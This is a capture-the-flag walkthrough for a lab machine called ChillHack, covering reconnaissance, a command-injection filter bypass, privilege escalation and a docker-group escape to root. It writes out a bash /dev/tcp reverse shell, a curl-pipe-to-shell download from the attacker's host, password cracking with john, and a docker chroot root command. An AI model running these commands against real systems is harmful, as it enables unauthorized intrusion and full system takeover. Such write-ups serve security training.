ChillHack

Reconnaissance
Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)
nmap -Pn 10.10.161.202

Detailed Nmap Scan :
Command Breakdown:
(-sV): Service version
(-sC): Default nmap scripts
(-p): Specifying ports 21,22,80
(-oN nmap): Saving it into a file called nmap
nmap -sV -sC -p 21,22,80 -oN nmap 10.10.161.202

Enumeration
Port 21: FTP
We see in the nmap scan that Anonymous FTP login is allowed, so lets login
ftp 10.10.161.202

Listing the files we see that there is a note.txt
file so lets transfer this file to our machine.
get note.txt

Lets read note.txt

We have two usernames, Anurodh
and Apaar
, lets add this to our notes.

We also see that there is some filtering on strings being put in the command, which we might encounter while enumerating this machine further.
Port 80: HTTP
Lets visit the site.

Looks like a very well made website, lets run gobuster to find hidden directories while we explore the webpage.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.161.202
I looked through the website and found nothing interesting in the source code too, after a while I got the results for the gobuster scan

Lets visit this /secre
t directory.

Looks like we can execute commands, lets try executing a basic command. When I tried executing ls
it gave me this.

Now looking back at the note.txt
, it mentioned that there was filtering on the commands, so to bypass that I remembered there was a way we could bypass filtering, we can do this by using backslashes in the command. We are no escaping any special characters so then the word will be interpreted the same way by bash. Lets try l\s
.

And it worked so now lets check the index.php page which will tell us what characters and words are being filtered.
c\at index.php
After executing the look at the source code.

We have a list of words that have been blacklisted which means that we cannot use them on the system, also we can see the function that allows command injection. Lets now try to get a reverse shell on the machine.
Exploitation
First we create a bash reverse shell
Second we transfer it to the victim machine by starting a http server on our machine and using the curl command
Finally once the file is downloaded we can start a netcat listener and execute the file we transferred to get a reverse shell on the machine.
First we create a bash reverse shell called shell.sh
bash -c "bash -i >& /dev/tcp/<your-ip>/1234 0>&1"
Now we start a http server
python3 -m http.server 8000

Lets also start a netcat listener.
nc -lvnp 1234

Now we download the file on the victim machine using curl and then execute is using bash in the same command. We are using a backslash in bash as it has been blacklisted.
curl <your-ip>:8000/shell.sh | ba\sh
After executing the command, we get a reverse shell.

Lets now stabilize the shell.
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo; fg
reset
Ctrl + C

Privilege Escalation
Looking at the files in the system, we did not have permissions to read most of them, so lets run a automatic enumeration script called linpeas
, you can find this google, once you download it we have to transfer to this machine.

We already have a http server running, if you switched it off, start is up again.

Now we have to go the /tmp
directory as we are not allowed to download files in other directories and usually /tmp
always gives us permissions to download files into its directory.
wget http://<your-ip>:8000/linpeas.sh

Before this lets run sudo -l
to see what we can run as other users.

Looks like we can run a script file, lets read it.

Looking at the script, it looks like it is vulnerable to command injection as there are no filters. And this file is owned by Apaar, we can try running it and execute a bash shell and get a bash instance as the user Apaar.
Lets first run the file and then type /bin/bash
to get a shell as Apaar and then stabilize the shell.
sudo -u apaar /home/apaar/.helpline.sh
/bin/bash
python3 -c 'import pty; pty.spawn("/bin/bash")'

We are now the user Apaar. We can read the User flag now in Apaar's
home directory.

Now I tried running linpeas but It did not work so I had to find another way to privilege escalate and that is when I found an interesting files in /var/www/files
.

Lets read these files
hacker.php

This looks like it is displaying a image file and there is a message which is telling that there might be something in the image file . Lets download this file, before that lets explore the other files.
account.php
account.php

This looks like a login page.
index.php
index.php

In this file we see the credentials for the SQL database running on this machine.
Lets now download the image file we found in hacker.php, first lets go to the directory in which the file is present.

Lets start a http server on this machine.
python3 -m http.server 8000

Now lets download the file onto our machine
wget http://10.10.161.202:8000/hacker-with-laptop_23-2147985341.jpg

Now lets look at the file

Lets use steghide to look for hidden information in the file. (Click enter for the password)
steghide info hacker-with-laptop_23-2147985341.jpg

We see a zip file, lets extract it using steghide
.
steghide --extract -sf hacker-with-laptop_23-2147985341.jpg

Lets unzip this zip file that we got.
unzip backup.zip

Looks like we need a password, we can use zip2john
and then john the ripper
to find the password.
zip2john backup.zip > hash

Now use john to crack the password
john --wordlist=/usr/share/wordlists/rockyou.txt hash

Now show the password
john hash --show

We have the password. Lets unzip the zip the file
unzip backup.zip

Lets read the source_code.php
file

Looking through we find the base64 text that is the password for the user Anurodh
. Lets decode the string.
echo "IWQwbnRLbjB3bVlwQHNzdzByZA==" | base64 -d

We the password, lets now login through ssh.

We are now logged in. I was looking through and did not see anything of interest until I ran the command id
.
id

Anurodh is part of the docker group. We can find the command to become root on GTFOBins.

Lets run this command
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

We are now root.
Last updated
Was this helpful?